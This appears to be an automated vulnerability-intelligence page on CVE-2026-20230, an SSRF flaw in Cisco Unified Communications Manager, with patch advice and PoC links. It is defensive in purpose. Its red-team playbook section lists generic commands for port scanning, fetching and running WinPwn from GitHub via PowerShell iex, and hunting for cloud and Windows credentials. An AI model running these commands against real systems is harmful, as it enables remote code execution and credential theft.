CVE-2026-20230
Overview
This vulnerability is a server-side request forgery (SSRF) arising from improper input validation of specific HTTP requests in Cisco Unified Communications Manager and its Session Management Edition. The flaw exists within the WebDialer service component, which processes HTTP requests without sufficient sanitization, allowing crafted requests to manipulate internal server behavior. The root cause is the lack of validation on input parameters that control file operations on the underlying operating system.
Vulnerability Description
A vulnerability in Cisco Unified Communications Manager (Unified CM) and Cisco Unified Communications Manager Session Management Edition (Unified CM SME) could allow an unauthenticated, remote attacker to conduct server-side request forgery (SSRF) attacks through an affected device. This vulnerability is due to improper input validation for specific HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to write files to the underlying operating system that could be used later to elevate to root. Note: Cisco has assigned this security advisory a Security Impact Rating (SIR) of Critical rather than High as the score indicates. The reason is that exploitation of this vulnerability could result in an attacker elevating privileges to root. Note: To exploit this vulnerability, the WebDialer service must be enabled. WebDialer is disabled by default.
Impact
An unauthenticated remote attacker can exploit this vulnerability to write files on the system hosting Cisco Unified Communications Manager, enabling privilege escalation to root. No user interaction or credentials are required, only that the WebDialer service is enabled. This can lead to full system compromise, allowing attackers to execute arbitrary code with the highest privileges, potentially disrupting communications infrastructure and exposing sensitive data within enterprise environments.
Solution
Cisco has released a security advisory (cisco-sa-cucm-ssrf-cXPnHcW) detailing this vulnerability and recommends applying the patches provided therein. Administrators should update Cisco Unified Communications Manager and Unified CM SME to the fixed versions as specified in the advisory. Additionally, disabling the WebDialer service, which is off by default, can mitigate the risk if immediate patching is not feasible. For detailed patching instructions and version information, refer to Cisco’s official security advisory page.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Cisco Unified Communications Manager and its Session Management Edition arises from improper input validation for specific HTTP requests. This flaw allows an unauthenticated remote attacker to conduct server-side request forgery (SSRF) attacks. In essence, SSRF vulnerabilities enable attackers to manipulate a server into making requests to unintended locations, which can include internal resources that are otherwise protected from external access. The improper validation of input means that crafted HTTP requests can be sent to the affected device, potentially leading to unauthorized file writes on the underlying operating system. This capability is particularly concerning as it can facilitate further escalation of privileges, allowing an attacker to gain root access.
Exploitation of this vulnerability requires the WebDialer service to be enabled, which is not the default setting. However, if an organization has enabled this service, the attack vector becomes significantly more feasible. An attacker could leverage this vulnerability by sending a specifically crafted HTTP request to the device, which would then process the request without proper validation. Once the attacker gains the ability to write files to the underlying operating system, they could deploy malicious scripts or binaries that would enable them to escalate privileges and gain full control over the system. This exploitation method underscores the critical nature of the vulnerability, as it opens the door to further attacks within the network.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on Cisco Unified Communications Manager for their communication infrastructure. Successful exploitation could lead to unauthorized access to sensitive data, disruption of communication services, or even complete compromise of the affected system. The potential for privilege escalation to root means that an attacker could not only manipulate the Unified Communications Manager but also access other systems and data within the network. This poses significant business risks, including financial loss, reputational damage, and regulatory repercussions, especially in industries where data protection is paramount.
To detect and mitigate this vulnerability, organizations should first ensure that the WebDialer service is disabled unless absolutely necessary. Regular audits of system configurations and services can help identify any instances where this service has been enabled. Additionally, implementing robust input validation and sanitization measures can help prevent SSRF attacks. Network segmentation and strict access controls can also limit the potential damage by restricting access to sensitive internal resources. Organizations should continuously monitor their systems for unusual activity and employ intrusion detection systems to identify potential exploitation attempts. Regular software updates and patches from Cisco should be applied promptly to address any known vulnerabilities and enhance the overall security posture.
In conclusion, the vulnerability in Cisco Unified Communications Manager presents a critical risk due to its potential for exploitation through SSRF attacks. The ability for an attacker to gain root access via improper input validation highlights the importance of maintaining strict security practices and configurations. Organizations must remain vigilant in their security measures, ensuring that they are prepared to detect, mitigate, and respond to such vulnerabilities to safeguard their communication infrastructure and sensitive data.
CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting CVE-2026-20230, with a significant increase in observed attempts to leverage this SSRF vulnerability in Cisco Unified Communications Manager environments. Notably, multiple new proof-of-concept exploits have emerged publicly, including several hosted on GitHub, which lowers the barrier for threat actors to weaponize this flaw. This development coincides with the vulnerability’s addition to the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring its elevated priority for remediation across critical infrastructure sectors. Our telemetry indicates that exploitation attempts are becoming more frequent and automated, suggesting that adversaries are actively integrating these tools into their operational frameworks. The updated CVSS score of 8.6 and an EPSS score placing it near the top percentile of likely exploitation further elevate the urgency of this threat. Consequently, the risk posture for organizations running affected Cisco Unified Communications Manager versions has shifted from moderate to high, reflecting both the increased availability of exploit code and the growing exploitation activity observed in the wild.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Unified Communications Manager | All |
cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:-:*:*:*
|
|
|
Cisco | Unified Communications Manager | All |
cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:session_management:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (3)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
HORKimhab/CVE-2026-20230
CVE-2026-20230 - Cisco Unified CM
|
HORKimhab | 1 | 1 | 2026-06-05 | View |
|
W5M1n9/Cisco-Unified-Communications-Manager-Server-Side-Forgery-Request-Vulnerability-CVE-2026-20230
|
W5M1n9 | 0 | 1 | 2026-06-25 | View |
|
HalilDeniz/CVE-2026-20230-Scanner
Cisco Unified Communications Manager (Unified CM) deployments affected by CVE-2026-20230.
|
HalilDeniz | 0 | 0 | 2026-06-12 | View |
Threat Feed
26 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Sighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-664 | Server Side Request Forgery |
38%
|
High | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-20230 |
| sec.cloudapps.cisco.com |
GitHub CVE
|
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cucm-ssrf-cXPnHcW |
| denizhalil.com |
NVD API
|
https://denizhalil.com/2026/06/12/cve-2026-20230-cisco-unified-cm-ssrf/ |
| cisa.gov |
NVD API
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-20230 |